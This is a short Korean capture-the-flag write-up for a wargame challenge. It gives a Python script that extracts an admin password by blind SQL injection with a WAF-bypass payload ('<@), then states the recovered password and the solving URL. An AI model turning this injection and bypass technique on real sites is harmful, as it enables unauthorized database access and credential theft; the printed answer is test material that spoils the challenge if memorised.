
첫 화면이다.

파이썬 코드를 짜면 아래와 같다.

import requests

URL = 'https://modsec.rubiya.kr/chall/godzilla_799f2ae774c76c0bfd8429b8d5692918.php?id='
TRUE_PHRASE = 'Hello admin'

def query(payload):
    cookies = {'PHPSESSID': PHPSESSID}
    r = requests.get(URL + payload, cookies=cookies)
    content = r.text
    return TRUE_PHRASE in content

# 8
def find_pw_length():
    pw_len = 1
    while query("'<@ or id='admin' and length(pw)={} or '".format(pw_len)) is False:
        pw_len += 1
    print('pw_len: {}'.format(pw_len))
    return pw_len

# a18a6cc5
def find_pw():
    pw_len = find_pw_length()
    pw = ''
    for pos in range(1, pw_len + 1):
        for character in range(0, 128):
            if query("'<@ or id='admin' and ord(substr(pw,{},1))={} or '".format(pos, character)) is True:
                pw += chr(character)
    print('pw: {}'.format(pw))


실행결과, pw는 a18a6cc5 이다.

https://modsec.rubiya.kr/chall/godzilla_799f2ae774c76c0bfd8429b8d5692918.php?pw=a18a6cc5 에 접속하면 문제가 풀린다.

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